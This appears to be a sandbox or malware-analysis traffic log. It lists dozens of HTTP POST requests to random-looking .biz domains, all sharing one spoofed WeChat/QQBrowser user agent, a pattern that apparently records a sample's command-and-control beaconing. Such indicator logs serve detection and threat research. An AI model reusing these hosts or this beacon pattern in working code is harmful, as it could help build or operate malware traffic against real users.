                      Source: global trafficHTTP traffic detected: POST /sjbqcomcuhgq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ywffr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /cetkmiomtp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /qaurkicngfeyta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ecxbwt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /rstn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /kafps HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pectx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /tfidpljjhw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zyiexezl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /fqteasckvt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /bj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /ahrycwbcmx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: banwyw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /hg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /suewswdbcoj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /qjhbu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /lxqioayc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /ryyevidfy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zrlssa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /dgyuecpahg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /wpvwjnrkggb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jlqltsjvh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /xgyfws HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /jgtblooqbwhrf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /gneaufgitjsgivk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xyrgy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /of HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /qccuqoixlchlyacl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /qwi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /spfkautpyscpm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /maknfkucqejsqyr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kvbjaur.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /vvlccgkwe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uaafd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uphca.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /moskhedrm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: eufxebus.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /onpettusm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fjumtfnz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /ongyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pwlqfu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /ohh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hlzfuyy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /ppkkwetxneotu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rffxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /tthsijmbkytx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rffxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /boewdnuriy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rrqafepng.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /ocbfkvtqd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cikivjto.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /fwoniptuhqdju HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ctdtgwag.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /uwxvqmmhft HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qncdaagct.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /kiomuyfeojupahpj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tnevuluw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /eopa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: whjovd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /sfxeb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: shpwbsrw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /rdprguwpemxsj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: shpwbsrw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /iwsqruc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /qdah HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /qqwrhv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: reczwga.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /tdpbrlvdvj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cjvgcl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /uqrndrlxohccj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bghjpy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /c HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: neazudmrq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /rhvrr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: damcprvgv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /hcxckxhcrylndis HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pgfsvwx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /endslraolyt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ocsvqjg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /wrm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pgfsvwx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /eqdqnwt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ywffr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /gkxkncupxf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: aatcwo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /ueqgjagfiftcyqg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ecxbwt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /p HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kcyvxytog.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /fwmpclgaucigeci HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pectx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /spsgkhffyetnrgw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nwdnxrd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /vpmqhiaoleilobao HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zyiexezl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /eqhek HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nwdnxrd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /bbs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: banwyw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /rrc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /taydbacowhdepc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ereplfx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /akudgulwcdy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /wsjkgdks HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ptrim.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /uamrte HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zrlssa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /illrgnebn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jlqltsjvh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
